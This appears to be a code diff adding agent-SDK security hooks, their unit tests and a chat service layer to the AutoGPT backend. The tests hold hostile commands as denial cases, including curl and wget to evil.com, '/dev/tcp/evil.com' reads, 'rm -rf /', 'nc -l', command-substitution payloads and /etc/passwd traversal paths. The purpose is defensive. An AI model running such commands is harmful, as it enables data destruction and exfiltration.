+    Args:
+        user_id: Current user ID for isolation validation
+        sdk_cwd: SDK working directory for workspace-scoped tool validation
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions
+    """
+    try:
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def pre_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Combined pre-tool-use validation hook."""
+            _ = context  # unused but required by signature
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
+
+            # Strip MCP prefix for consistent validation
+            is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
+            clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
+
+            # Only block non-CoPilot tools; our MCP-registered tools
+            # (including Read for oversized results) are already sandboxed.
+            if not is_copilot_tool:
+                result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
+                if result:
+                    return cast(SyncHookJSONOutput, result)
+
+            # Validate user isolation (applies to CoPilot tools as well)
+            result = _validate_user_isolation(clean_name, tool_input, user_id)
+            if result:
+                return cast(SyncHookJSONOutput, result)
+
+            # An empty dict carries no deny decision
+            logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log successful tool executions for observability."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_failure_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log failed tool executions for debugging."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            error = input_data.get("error", "Unknown error")
+            logger.warning(
+                f"[SDK] Tool failed: {tool_name}, error={error}, "
+                f"user={user_id}, tool_use_id={tool_use_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        async def pre_compact_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log when SDK triggers context compaction.
+
+            The SDK automatically compacts conversation history when it grows too large.
+            This hook provides visibility into when compaction happens.
+            """
+            _ = context, tool_use_id
+            trigger = input_data.get("trigger", "auto")
+            logger.info(
+                f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        # One catch-all matcher per event so every tool call passes through.
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
+            ],
+            "PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
+        }
+    except ImportError:
+        # Fallback for when SDK isn't available - return empty hooks
+        # NOTE(review): this fails open; callers get no PreToolUse validation.
+        logger.warning("claude-agent-sdk not available, security hooks disabled")
+        return {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
@@ -0,0 +1,258 @@
+"""Unit tests for SDK security hooks."""
+
+import os
+
+from .security_hooks import _validate_tool_access, _validate_user_isolation
+
+# Workspace directory used by every test that passes ``sdk_cwd``.
+SDK_CWD = "/tmp/copilot-abc123"
+
+
+def _is_denied(result: dict) -> bool:
+    """Return True when ``result`` is a hook payload with a ``deny`` decision."""
+    return result.get("hookSpecificOutput", {}).get("permissionDecision") == "deny"
+
+
+# -- Blocked tools -----------------------------------------------------------
+
+
+def test_blocked_tools_denied():
+    """Every name in the blocked set is rejected regardless of input."""
+    blocked_names = ("bash", "shell", "exec", "terminal", "command")
+    for name in blocked_names:
+        verdict = _validate_tool_access(name, {})
+        assert _is_denied(verdict), f"{name} should be blocked"
+
+
+def test_unknown_tool_allowed():
+    """A tool that matches no rule and has empty input passes through."""
+    assert _validate_tool_access("SomeCustomTool", {}) == {}
+
+
+# -- Workspace-scoped tools --------------------------------------------------
+
+
+def test_read_within_workspace_allowed():
+    """Read of a file directly under the workspace is permitted."""
+    tool_input = {"file_path": f"{SDK_CWD}/file.txt"}
+    assert _validate_tool_access("Read", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_write_within_workspace_allowed():
+    """Write to a file directly under the workspace is permitted."""
+    tool_input = {"file_path": f"{SDK_CWD}/output.json"}
+    assert _validate_tool_access("Write", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_edit_within_workspace_allowed():
+    """Edit of a nested workspace file is permitted."""
+    tool_input = {"file_path": f"{SDK_CWD}/src/main.py"}
+    assert _validate_tool_access("Edit", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_glob_within_workspace_allowed():
+    """Glob rooted at a workspace sub-directory is permitted."""
+    tool_input = {"path": f"{SDK_CWD}/src"}
+    assert _validate_tool_access("Glob", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_grep_within_workspace_allowed():
+    """Grep rooted at a workspace sub-directory is permitted."""
+    tool_input = {"path": f"{SDK_CWD}/src"}
+    assert _validate_tool_access("Grep", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_read_outside_workspace_denied():
+    """Read of a system file outside the workspace is rejected."""
+    tool_input = {"file_path": "/etc/passwd"}
+    assert _is_denied(_validate_tool_access("Read", tool_input, sdk_cwd=SDK_CWD))
+
+
+def test_write_outside_workspace_denied():
+    """Write to a path outside the workspace is rejected."""
+    tool_input = {"file_path": "/home/user/secrets.txt"}
+    assert _is_denied(_validate_tool_access("Write", tool_input, sdk_cwd=SDK_CWD))
+
+
+def test_traversal_attack_denied():
+    """A path that starts in the workspace but climbs out via ``..`` is rejected."""
+    tool_input = {"file_path": f"{SDK_CWD}/../../etc/passwd"}
+    assert _is_denied(_validate_tool_access("Read", tool_input, sdk_cwd=SDK_CWD))
+
+
+def test_no_path_allowed():
+    """Glob/Grep without a path argument defaults to cwd — should pass."""
+    assert _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD) == {}
+
+
+def test_read_no_cwd_denies_absolute():
+    """If no sdk_cwd is set, absolute paths are denied."""
+    verdict = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
+    assert _is_denied(verdict)
+
+
+# -- Tool-results directory --------------------------------------------------
+
+
+def test_read_tool_results_allowed():
+    """Files under a project's tool-results directory may be read."""
+    projects_root = os.path.expanduser("~") + "/.claude/projects"
+    target = f"{projects_root}/-tmp-copilot-abc123/tool-results/12345.txt"
+    verdict = _validate_tool_access("Read", {"file_path": target}, sdk_cwd=SDK_CWD)
+    assert verdict == {}
+
+
+def test_read_claude_projects_without_tool_results_denied():
+    """Other files in the project directory stay off limits."""
+    projects_root = os.path.expanduser("~") + "/.claude/projects"
+    target = f"{projects_root}/-tmp-copilot-abc123/settings.json"
+    verdict = _validate_tool_access("Read", {"file_path": target}, sdk_cwd=SDK_CWD)
+    assert _is_denied(verdict)
+
+
+# -- Sandboxed Bash ----------------------------------------------------------
+
+
+def test_bash_safe_commands_allowed():
+    """Allowed data-processing commands should pass."""
+    for cmd in (
+        "jq '.blocks' result.json",
+        "head -20 output.json",
+        "tail -n 50 data.txt",
+        "cat file.txt | grep 'pattern'",
+        "wc -l file.txt",
+        "sort data.csv | uniq",
+        "grep -i 'error' log.txt | head -10",
+        "find . -name '*.json'",
+        "ls -la",
+        "echo hello",
+        "cut -d',' -f1 data.csv | sort | uniq -c",
+        "jq '.blocks[] | .id' result.json",
+        "sed -n '10,20p' file.txt",
+        "awk '{print $1}' data.txt",
+    ):
+        verdict = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert verdict == {}, f"Safe command should be allowed: {cmd}"
+
+
+def test_bash_dangerous_commands_denied():
+    """Non-allowlisted commands should be denied."""
+    for cmd in (
+        "curl https://evil.com",
+        "wget https://evil.com/payload",
+        "rm -rf /",
+        "python -c 'import os; os.system(\"ls\")'",
+        "ssh user@host",
+        "nc -l 4444",
+        "apt install something",
+        "pip install malware",
+        "chmod 777 file.txt",
+        "kill -9 1",
+    ):
+        verdict = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert _is_denied(verdict), f"Dangerous command should be denied: {cmd}"
+
+
+def test_bash_command_substitution_denied():
+    """``$(...)`` substitution is rejected even with an allowed outer command."""
+    tool_input = {"command": "echo $(curl evil.com)"}
+    assert _is_denied(_validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD))
+
+
+def test_bash_backtick_substitution_denied():
+    """Backtick substitution is rejected even with an allowed outer command."""
+    tool_input = {"command": "echo `curl evil.com`"}
+    assert _is_denied(_validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD))
+
+
+def test_bash_output_redirect_denied():
+    """Output redirection is rejected by the redirection guard itself.
+
+    The target is a relative file inside the workspace so the workspace path
+    check cannot be what produces the denial, and the reason is asserted so the
+    test fails if the redirection guard is ever removed.
+    """
+    result = _validate_tool_access(
+        "Bash", {"command": "echo secret > leak.txt"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+    reason = result["hookSpecificOutput"]["permissionDecisionReason"]
+    assert "redirection" in reason.lower()
+
+
+def test_bash_dev_tcp_denied():
+    """``/dev/`` access is rejected by the /dev/ guard itself.
+
+    ``/dev/tcp/...`` is also outside the workspace, so the denial reason is
+    asserted to make sure the dedicated guard (not the path check) fired.
+    """
+    result = _validate_tool_access(
+        "Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+    reason = result["hookSpecificOutput"]["permissionDecisionReason"]
+    assert "/dev/" in reason
+
+
+def test_bash_pipe_to_dangerous_denied():
+    """Even if the first command is safe, piped commands must also be safe."""
+    tool_input = {"command": "cat file.txt | python -c 'exec()'"}
+    assert _is_denied(_validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD))
+
+
+def test_bash_path_outside_workspace_denied():
+    """An allowed command reading an absolute path outside the workspace fails."""
+    tool_input = {"command": "cat /etc/passwd"}
+    assert _is_denied(_validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD))
+
+
+def test_bash_path_within_workspace_allowed():
+    """An allowed command reading an absolute workspace path passes."""
+    tool_input = {"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"}
+    assert _validate_tool_access("Bash", tool_input, sdk_cwd=SDK_CWD) == {}
+
+
+def test_bash_empty_command_denied():
+    """An empty command string is rejected."""
+    verdict = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
+    assert _is_denied(verdict)
+
+
+# -- Dangerous patterns ------------------------------------------------------
+
+
+def test_dangerous_pattern_blocked():
+    """Input of an arbitrary tool containing ``sudo`` / ``rm -rf`` is rejected."""
+    verdict = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
+    assert _is_denied(verdict)
+
+
+def test_subprocess_pattern_blocked():
+    """Input of an arbitrary tool mentioning ``subprocess`` is rejected."""
+    verdict = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
+    assert _is_denied(verdict)
+
+
+# -- User isolation ----------------------------------------------------------
+
+
+def test_workspace_path_traversal_blocked():
+    """A relative path containing ``..`` is rejected for workspace tools."""
+    tool_input = {"path": "../../../etc/shadow"}
+    verdict = _validate_user_isolation("workspace_read", tool_input, user_id="user-1")
+    assert _is_denied(verdict)
+
+
+def test_workspace_absolute_path_blocked():
+    """An absolute path is rejected for workspace tools."""
+    tool_input = {"path": "/etc/passwd"}
+    verdict = _validate_user_isolation("workspace_read", tool_input, user_id="user-1")
+    assert _is_denied(verdict)
+
+
+def test_workspace_normal_path_allowed():
+    """A plain relative path is accepted for workspace tools."""
+    tool_input = {"path": "src/main.py"}
+    verdict = _validate_user_isolation("workspace_read", tool_input, user_id="user-1")
+    assert verdict == {}
+
+
+def test_non_workspace_tool_passes_isolation():
+    """Tools without "workspace" in their name are not path-checked."""
+    tool_input = {"query": "email"}
+    verdict = _validate_user_isolation("find_agent", tool_input, user_id="user-1")
+    assert verdict == {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/service.py
@@ -0,0 +1,556 @@
+"""Claude Agent SDK service layer for CoPilot chat completions."""
+
+import asyncio
+import json
+import logging
+import os
+import re
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any
+
+from backend.util.exceptions import NotFoundError
+
+from ..config import ChatConfig
+from ..model import (
+    ChatMessage,
+    ChatSession,
+    Usage,
+    get_chat_session,
+    update_session_title,
+    upsert_chat_session,
+)
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamStart,
+    StreamTextDelta,
+    StreamToolInputAvailable,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from ..service import _build_system_prompt, _generate_session_title
+from ..tracking import track_user_message
+from .anthropic_fallback import stream_with_anthropic
+from .response_adapter import SDKResponseAdapter
+from .security_hooks import create_security_hooks
+from .tool_adapter import (
+    COPILOT_TOOL_NAMES,
+    create_copilot_mcp_server,
+    set_execution_context,
+)
+from .tracing import TracedSession, create_tracing_hooks, merge_hooks
+
+logger = logging.getLogger(__name__)
+# Module-wide chat configuration, instantiated once at import time.
+config = ChatConfig()
+
+# Set to hold background tasks to prevent garbage collection
+_background_tasks: set[asyncio.Task[Any]] = set()
+
+
+# Prefix of every per-session SDK working directory; _make_sdk_cwd appends the
+# sanitized session id and _cleanup_sdk_tool_results refuses other paths.
+_SDK_CWD_PREFIX = "/tmp/copilot-"
+
+# Appended to the system prompt to inform the agent about Bash restrictions.
+# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
+# but it doesn't know about our security hooks' command allowlist for Bash.
+_SDK_TOOL_SUPPLEMENT = """
+
+## Bash restrictions
+
+The Bash tool is restricted to safe, read-only data-processing commands:
+jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
+echo, diff, base64, and similar utilities.
+Network commands (curl, wget), destructive commands (rm, chmod), and
+interpreters (python, node) are NOT available.
+"""
+
+
+def _resolve_sdk_model() -> str | None:
+    """Pick the model name handed to the Claude Agent SDK CLI.
+
+    ``config.claude_agent_model`` wins when it is set.  Otherwise
+    ``config.model`` is used with everything up to and including the first
+    ``/`` removed (e.g. ``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``);
+    a value without ``/`` is returned unchanged.
+    """
+    explicit = config.claude_agent_model
+    if explicit:
+        return explicit
+
+    configured = config.model
+    _provider, separator, bare_name = configured.partition("/")
+    return bare_name if separator else configured
+
+
+def _build_sdk_env() -> dict[str, str]:
+    """Build env vars for the SDK CLI process.
+
+    Routes API calls through OpenRouter (or a custom base_url) using
+    the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
+    This gives per-call token and cost tracking on the OpenRouter dashboard.
+
+    Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
+    token are both present — otherwise returns an empty dict so the SDK
+    falls back to its default credentials.  A URL is considered valid when it
+    parses with an ``http`` or ``https`` scheme and a non-empty host; a bare
+    ``startswith("http")`` test would also accept values such as ``httpfoo``
+    or ``http:`` and then blank out the default API key for nothing.
+
+    Returns:
+        Mapping with ``ANTHROPIC_BASE_URL``, ``ANTHROPIC_AUTH_TOKEN`` and an
+        empty ``ANTHROPIC_API_KEY``, or an empty mapping.
+    """
+    from urllib.parse import urlsplit
+
+    env: dict[str, str] = {}
+    if not (config.api_key and config.base_url):
+        return env
+
+    # Strip /v1 suffix — SDK expects the base URL without a version path
+    base = config.base_url.strip().rstrip("/")
+    if base.endswith("/v1"):
+        base = base[:-3]
+
+    try:
+        parsed = urlsplit(base)
+    except ValueError:
+        # Unparseable URL (e.g. malformed IPv6 host) — keep SDK defaults
+        return env
+    if parsed.scheme not in ("http", "https") or not parsed.netloc:
+        # Invalid base_url — don't override SDK defaults
+        return env
+
+    env["ANTHROPIC_BASE_URL"] = base
+    env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
+    # Must be explicitly empty so the CLI uses AUTH_TOKEN instead
+    env["ANTHROPIC_API_KEY"] = ""
+    return env
+
+
+def _make_sdk_cwd(session_id: str) -> str:
+    """Derive the session-specific working directory path for the SDK.
+
+    The session id is reduced to ASCII letters, digits and hyphens, appended
+    to the fixed prefix, normalised, and then re-checked against the prefix
+    (normpath + startswith is the pattern CodeQL recognises as a sanitizer).
+
+    Raises:
+        ValueError: If nothing is left of the id after sanitization, or the
+            normalised path no longer starts with the prefix.
+    """
+    sanitized = re.sub(r"[^A-Za-z0-9-]", "", session_id)
+    if sanitized == "":
+        raise ValueError("Session ID is empty after sanitization")
+
+    candidate = os.path.normpath(f"{_SDK_CWD_PREFIX}{sanitized}")
+    if candidate.startswith(_SDK_CWD_PREFIX):
+        # Second, independent check kept as defense-in-depth.
+        assert candidate.startswith(
+            "/tmp/copilot-"
+        ), f"Path validation failed: {candidate}"
+        return candidate
+
+    raise ValueError(f"Session path escaped prefix: {candidate}")
+
+
+def _cleanup_sdk_tool_results(cwd: str) -> None:
+    """Remove SDK tool-result files for a specific session working directory.
+
+    The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
+    We clean only the specific cwd's results to avoid race conditions between
+    concurrent sessions.  The session working directory itself is removed
+    afterwards.  Cleanup is best-effort: filesystem errors are logged at debug
+    level and never raised.
+
+    Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
+
+    Args:
+        cwd: Session working directory; anything not under the SDK prefix is
+            rejected with a warning and nothing is deleted.
+    """
+    import shutil
+
+    # Security check 1: Validate cwd is under the expected prefix
+    normalized = os.path.normpath(cwd)
+    if not normalized.startswith(_SDK_CWD_PREFIX):
+        logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
+        return
+
+    # Security check 2: Ensure no path traversal in the normalized path
+    if ".." in normalized:
+        logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
+        return
+
+    # SDK encodes the cwd path by replacing '/' with '-'
+    encoded_cwd = normalized.replace("/", "-")
+
+    # Construct the project directory path (known-safe home expansion)
+    claude_projects = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+    project_dir = os.path.normpath(os.path.join(claude_projects, encoded_cwd))
+
+    # Security check 3: project_dir must be strictly below ~/.claude/projects.
+    # The separator is part of the prefix so a sibling such as
+    # "~/.claude/projects-x" cannot pass.
+    if not project_dir.startswith(claude_projects + os.sep):
+        logger.warning(
+            f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
+        )
+        return
+
+    results_dir = os.path.join(project_dir, "tool-results")
+    if os.path.isdir(results_dir):
+        try:
+            filenames = os.listdir(results_dir)
+        except OSError as e:
+            # Directory vanished or became unreadable between the two calls.
+            logger.debug(f"[SDK] Could not list {results_dir}: {e}")
+            filenames = []
+        for filename in filenames:
+            file_path = os.path.join(results_dir, filename)
+            try:
+                if os.path.isfile(file_path):
+                    os.remove(file_path)
+            except OSError as e:
+                logger.debug(f"[SDK] Could not remove {file_path}: {e}")
+
+    # Also clean up the temp cwd directory itself (errors are ignored)
+    shutil.rmtree(normalized, ignore_errors=True)
+
+
+async def _compress_conversation_history(
+    session: ChatSession,
+) -> list[ChatMessage]:
+    """Shrink the messages preceding the current one when they are too large.
+
+    Delegates to the shared compress_context() from prompt.py, first with an
+    OpenAI-compatible client and, if that attempt raises, again without a
+    client.  compress_context supports:
+    - LLM summarization of old messages (keeps recent ones intact)
+    - Progressive content truncation as fallback
+    - Middle-out deletion as last resort
+
+    Returns the prior messages (everything except the current message),
+    rebuilt from the compressed form when compaction happened and untouched
+    otherwise.
+    """
+    prior = session.messages[:-1]
+    if len(prior) < 2:
+        return prior
+
+    from backend.util.prompt import compress_context
+
+    def _as_dict(msg: ChatMessage) -> dict[str, Any]:
+        # Only truthy optional fields are carried over.
+        entry: dict[str, Any] = {"role": msg.role}
+        for field in ("content", "tool_calls", "tool_call_id"):
+            value = getattr(msg, field)
+            if value:
+                entry[field] = value
+        return entry
+
+    messages_dict = [_as_dict(msg) for msg in prior]
+
+    try:
+        import openai
+
+        async with openai.AsyncOpenAI(
+            api_key=config.api_key, base_url=config.base_url, timeout=30.0
+        ) as client:
+            result = await compress_context(
+                messages=messages_dict,
+                model=config.model,
+                client=client,
+            )
+    except Exception as e:
+        logger.warning(f"[SDK] Context compression with LLM failed: {e}")
+        # Fall back to truncation-only (no LLM summarization)
+        result = await compress_context(
+            messages=messages_dict,
+            model=config.model,
+            client=None,
+        )
+
+    if not result.was_compacted:
+        return prior
+
+    logger.info(
+        f"[SDK] Context compacted: {result.original_token_count} -> "
+        f"{result.token_count} tokens "
+        f"({result.messages_summarized} summarized, "
+        f"{result.messages_dropped} dropped)"
+    )
+    # Convert compressed dicts back to ChatMessages
+    rebuilt: list[ChatMessage] = []
+    for m in result.messages:
+        rebuilt.append(
+            ChatMessage(
+                role=m["role"],
+                content=m.get("content"),
+                tool_calls=m.get("tool_calls"),
+                tool_call_id=m.get("tool_call_id"),
+            )
+        )
+    return rebuilt
+
+
+def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
+    """Render prior messages as a context prefix for the user message.
+
+    The result looks like:
+        <conversation_history>
+        User: hello
+        You responded: Hi! How can I help?
+        </conversation_history>
+
+    Messages without content and messages whose role is neither ``user`` nor
+    ``assistant`` (e.g. tool messages) are left out.  Returns None when
+    nothing remains to render.
+    """
+    prefixes = {"user": "User: ", "assistant": "You responded: "}
+    rendered = [
+        prefixes[msg.role] + f"{msg.content}"
+        for msg in messages
+        if msg.content and msg.role in prefixes
+    ]
+    if not rendered:
+        return None
+
+    body = "\n".join(rendered)
+    return "<conversation_history>\n" + body + "\n</conversation_history>"
+
+
+async def stream_chat_completion_sdk(
+    session_id: str,
+    message: str | None = None,
+    tool_call_response: str | None = None,  # noqa: ARG001
+    is_user_message: bool = True,
+    user_id: str | None = None,
+    retry_count: int = 0,  # noqa: ARG001
+    session: ChatSession | None = None,
+    context: dict[str, str] | None = None,  # noqa: ARG001
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream chat completion using Claude Agent SDK.
+
+    Drop-in replacement for stream_chat_completion with improved reliability.
+
+    Args:
+        session_id: Id of the chat session; used to load the session when
+            ``session`` is not supplied.
+        message: New message text; appended to the session when non-empty.
+        tool_call_response: Unused in this implementation (ARG001 suppressed).
+        is_user_message: Whether ``message`` is stored with role "user"
+            (True) or "assistant" (False).
+        user_id: Owner of the session, if known.
+        retry_count: Unused in this implementation (ARG001 suppressed).
+        session: Pre-loaded session; fetched via ``session_id`` when None.
+        context: Unused in this implementation (ARG001 suppressed).
+
+    Yields:
+        ``StreamStart`` first, then the responses converted from SDK
+        messages (or produced by the Anthropic fallback), ending with
+        ``StreamFinish``. If an exception occurs after ``StreamStart``, a
+        generic ``StreamError`` followed by ``StreamFinish`` is yielded
+        instead of raising.
+
+    Raises:
+        NotFoundError: If the session cannot be found.
+    """
+
+    if session is None:
+        session = await get_chat_session(session_id, user_id)
+
+    if not session:
+        raise NotFoundError(
+            f"Session {session_id} not found. Please create a new session first."
+        )
+
+    if message:
+        session.messages.append(
+            ChatMessage(
+                role="user" if is_user_message else "assistant", content=message
+            )
+        )
+        if is_user_message:
+            track_user_message(
+                user_id=user_id, session_id=session_id, message_length=len(message)
+            )
+
+    # Persist the session (including the message appended above) before
+    # any streaming starts.
+    session = await upsert_chat_session(session)
+
+    # Generate title for new sessions (first user message)
+    if is_user_message and not session.title:
+        user_messages = [m for m in session.messages if m.role == "user"]
+        if len(user_messages) == 1:
+            first_message = user_messages[0].content or message or ""
+            if first_message:
+                task = asyncio.create_task(
+                    _update_title_async(session_id, first_message, user_id)
+                )
+                # Hold a reference until the task finishes so it is not
+                # garbage-collected while still running.
+                _background_tasks.add(task)
+                task.add_done_callback(_background_tasks.discard)
+
+    # Build system prompt (reuses non-SDK path with Langfuse support)
+    has_history = len(session.messages) > 1
+    system_prompt, _ = await _build_system_prompt(
+        user_id, has_conversation_history=has_history
+    )
+    system_prompt += _SDK_TOOL_SUPPLEMENT
+    message_id = str(uuid.uuid4())
+    text_block_id = str(uuid.uuid4())
+    task_id = str(uuid.uuid4())
+
+    yield StreamStart(messageId=message_id, taskId=task_id)
+
+    stream_completed = False
+    # Use a session-specific temp dir to avoid cleanup race conditions
+    # between concurrent sessions.
+    sdk_cwd = _make_sdk_cwd(session_id)
+    os.makedirs(sdk_cwd, exist_ok=True)
+
+    # Make user/session available to the tool handlers for this run.
+    set_execution_context(user_id, session, None)
+
+    try:
+        try:
+            # Imported lazily: an ImportError raised inside this inner try
+            # switches to the Anthropic fallback below.
+            from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
+
+            mcp_server = create_copilot_mcp_server()
+
+            sdk_model = _resolve_sdk_model()
+
+            # Initialize Langfuse tracing (no-op if not configured)
+            tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
+
+            # Merge security hooks with optional tracing hooks
+            security_hooks = create_security_hooks(user_id, sdk_cwd=sdk_cwd)
+            tracing_hooks = create_tracing_hooks(tracer)
+            combined_hooks = merge_hooks(security_hooks, tracing_hooks)
+
+            options = ClaudeAgentOptions(
+                system_prompt=system_prompt,
+                mcp_servers={"copilot": mcp_server},  # type: ignore[arg-type]
+                allowed_tools=COPILOT_TOOL_NAMES,
+                hooks=combined_hooks,  # type: ignore[arg-type]
+                cwd=sdk_cwd,
+                max_buffer_size=config.claude_agent_max_buffer_size,
+                model=sdk_model,
+                env=_build_sdk_env(),
+                user=user_id or None,
+                max_budget_usd=config.claude_agent_max_budget_usd,
+            )
+
+            adapter = SDKResponseAdapter(message_id=message_id)
+            adapter.set_task_id(task_id)
+
+            async with tracer, ClaudeSDKClient(options=options) as client:
+                # With no explicit message, fall back to the most recent
+                # user message stored in the session.
+                current_message = message or ""
+                if not current_message and session.messages:
+                    last_user = [m for m in session.messages if m.role == "user"]
+                    if last_user:
+                        current_message = last_user[-1].content or ""
+
+                # NOTE: this check runs after the SDK client has already
+                # been opened.
+                if not current_message.strip():
+                    yield StreamError(
+                        errorText="Message cannot be empty.",
+                        code="empty_prompt",
+                    )
+                    yield StreamFinish()
+                    return
+
+                # Build query with conversation history context.
+                # Compress history first to handle long conversations.
+                query_message = current_message
+                if len(session.messages) > 1:
+                    compressed = await _compress_conversation_history(session)
+                    history_context = _format_conversation_context(compressed)
+                    if history_context:
+                        query_message = (
+                            f"{history_context}\n\n"
+                            f"Now, the user says:\n{current_message}"
+                        )
+
+                # Logging and tracing use the bare message; the SDK gets
+                # the history-prefixed query.
+                logger.info(
+                    f"[SDK] Sending query: {current_message[:80]!r}"
+                    f" ({len(session.messages)} msgs in session)"
+                )
+                tracer.log_user_message(current_message)
+                await client.query(query_message, session_id=session_id)
+
+                # Bookkeeping for rebuilding ChatMessages from the stream:
+                #   assistant_response     - assistant message being built
+                #   accumulated_tool_calls - tool calls attached to it
+                #   has_appended_assistant - already in session.messages?
+                #   has_tool_results       - tool output seen since then?
+                assistant_response = ChatMessage(role="assistant", content="")
+                accumulated_tool_calls: list[dict[str, Any]] = []
+                has_appended_assistant = False
+                has_tool_results = False
+
+                async for sdk_msg in client.receive_messages():
+                    logger.debug(
+                        f"[SDK] Received: {type(sdk_msg).__name__} "
+                        f"{getattr(sdk_msg, 'subtype', '')}"
+                    )
+                    tracer.log_sdk_message(sdk_msg)
+                    for response in adapter.convert_message(sdk_msg):
+                        # StreamStart was already yielded above; drop any
+                        # copy produced by the adapter.
+                        if isinstance(response, StreamStart):
+                            continue
+                        yield response
+
+                        if isinstance(response, StreamTextDelta):
+                            delta = response.delta or ""
+                            # After tool results, start a new assistant
+                            # message for the post-tool text.
+                            if has_tool_results and has_appended_assistant:
+                                assistant_response = ChatMessage(
+                                    role="assistant", content=delta
+                                )
+                                accumulated_tool_calls = []
+                                # (Re-set to True right after the append
+                                # below, so the net effect is unchanged.)
+                                has_appended_assistant = False
+                                has_tool_results = False
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+                            else:
+                                assistant_response.content = (
+                                    assistant_response.content or ""
+                                ) + delta
+                                if not has_appended_assistant:
+                                    session.messages.append(assistant_response)
+                                    has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolInputAvailable):
+                            # Store the call as a "function" tool-call dict
+                            # with JSON-encoded arguments.
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": response.toolCallId,
+                                    "type": "function",
+                                    "function": {
+                                        "name": response.toolName,
+                                        "arguments": json.dumps(response.input or {}),
+                                    },
+                                }
+                            )
+                            assistant_response.tool_calls = accumulated_tool_calls
+                            if not has_appended_assistant:
+                                session.messages.append(assistant_response)
+                                has_appended_assistant = True
+
+                        elif isinstance(response, StreamToolOutputAvailable):
+                            # Tool results are stored as separate "tool"
+                            # messages; non-string output is stringified.
+                            session.messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=(
+                                        response.output
+                                        if isinstance(response.output, str)
+                                        else str(response.output)
+                                    ),
+                                    tool_call_id=response.toolCallId,
+                                )
+                            )
+                            has_tool_results = True
+
+                        elif isinstance(response, StreamUsage):
+                            session.usage.append(
+                                Usage(
+                                    prompt_tokens=response.promptTokens,
+                                    completion_tokens=response.completionTokens,
+                                    total_tokens=response.totalTokens,
+                                )
+                            )
+
+                        elif isinstance(response, StreamFinish):
+                            stream_completed = True
+
